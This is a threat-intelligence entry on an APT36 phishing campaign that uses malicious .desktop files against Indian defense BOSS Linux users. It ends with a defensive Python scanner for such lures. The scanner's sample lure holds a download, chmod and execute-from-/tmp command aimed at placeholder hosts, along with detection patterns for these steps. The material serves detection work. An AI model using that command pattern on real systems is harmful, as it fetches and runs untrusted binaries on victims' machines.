Phishing Attack: Deploying Malware on Indian Defense BOSS Linux
Essential information
- Published: 08/08/2025 17:08
- Modified: 10/08/2025 21:44
- Tags: .desktop file, 2025-08-08, apt36, boss linux, boss.elf, cyber espionage, elf binary, indian defense, phishing, transparent tribe
- Related entities: 8 observables, 1 intrusion set (APT), 4 techniques (MITRE), 3 others
Description
APT36, a Pakistan-based threat actor, has launched a sophisticated cyber-espionage campaign targeting the Indian defense sector. The group has adapted its tactics to focus on Linux-based environments, particularly BOSS Linux, used by Indian government agencies. The attack involves phishing emails with a ZIP file containing a malicious .desktop file. When executed, it downloads a legitimate PowerPoint file as a decoy while simultaneously deploying a malicious ELF binary. This multi-stage approach aims to bypass user suspicion and evade traditional security measures. The campaign signifies an advancement in APT36's capabilities and poses an increased risk to critical government and defense infrastructure. Organizations using Linux-based systems are advised to implement robust cybersecurity controls and threat detection mechanisms to mitigate potential risks.
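The lure chain described above (a .desktop launcher inside a ZIP that fetches a decoy document and an ELF) can be triaged at the mail gateway or on the endpoint before anyone double-clicks it. The following is an added example and not part of this report: a Python scanner that parses a constructed .desktop sample (the file name, Exec line and example.invalid hosts are hypothetical) and flags the download, chmod and temp-directory execution pattern, plus a ZIP walker since the attachment arrives zipped.

```python
import configparser
import io
import re
import zipfile
# Constructed .desktop lure modelled on the report (not a recovered artifact).
SAMPLE_LURE = """[Desktop Entry]
Name=Defence_Briefing.pptx
Terminal=false
Exec=sh -c "curl -s http://decoy.example.invalid/brief.pptx -o /tmp/brief.pptx; curl -s http://stage.example.invalid/boss.elf -o /tmp/boss.elf; chmod +x /tmp/boss.elf; /tmp/boss.elf; xdg-open /tmp/brief.pptx"
"""

EXEC_PATTERNS = {  # tells worth flagging in a launcher's Exec= line
    "network_download": re.compile(r"\b(curl|wget)\b"),
    "chmod": re.compile(r"\bchmod\b"),
    "exec_from_tmp": re.compile(r"/tmp/|/dev/shm/"),
    "shell_wrapper": re.compile(r"\b(sh|bash)\s+-c\b"),
}
DOC_NAME = re.compile(r"\.(pptx?|docx?|xlsx?|pdf)\s*$", re.I)

def analyze_desktop(text: str) -> list[str]:
    """Return findings for one .desktop file; an empty list means nothing was flagged."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # .desktop keys are case-sensitive
    parser.read_string(text)
    entry = parser["Desktop Entry"] if parser.has_section("Desktop Entry") else {}
    exec_line = entry.get("Exec", "")
    findings = [k for k, pat in EXEC_PATTERNS.items() if pat.search(exec_line)]
    # A hidden terminal keeps the victim from seeing the download pipeline run.
    if "shell_wrapper" in findings and entry.get("Terminal", "").lower() == "false":
        findings.append("hidden_terminal")
    # A launcher named like a document is impersonating the decoy it fetches.
    if DOC_NAME.search(entry.get("Name", "")):
        findings.append("document_masquerade")
    return findings

def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Analyze every .desktop member of a ZIP attachment, keyed by member name."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            if member.lower().endswith(".desktop"):
                results[member] = analyze_desktop(zf.read(member).decode("utf-8", "replace"))
    return results

def build_sample_zip() -> bytes:  # constructed attachment: lure beside a benign launcher
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Defence_Briefing.pptx.desktop", SAMPLE_LURE)
        zf.writestr("impress.desktop", "[Desktop Entry]\nName=Impress\nExec=libreoffice --impress %U\n")
    return buf.getvalue()
```

Any member that scores on network_download together with exec_from_tmp or chmod is worth quarantining and hashing for comparison against the report's observables.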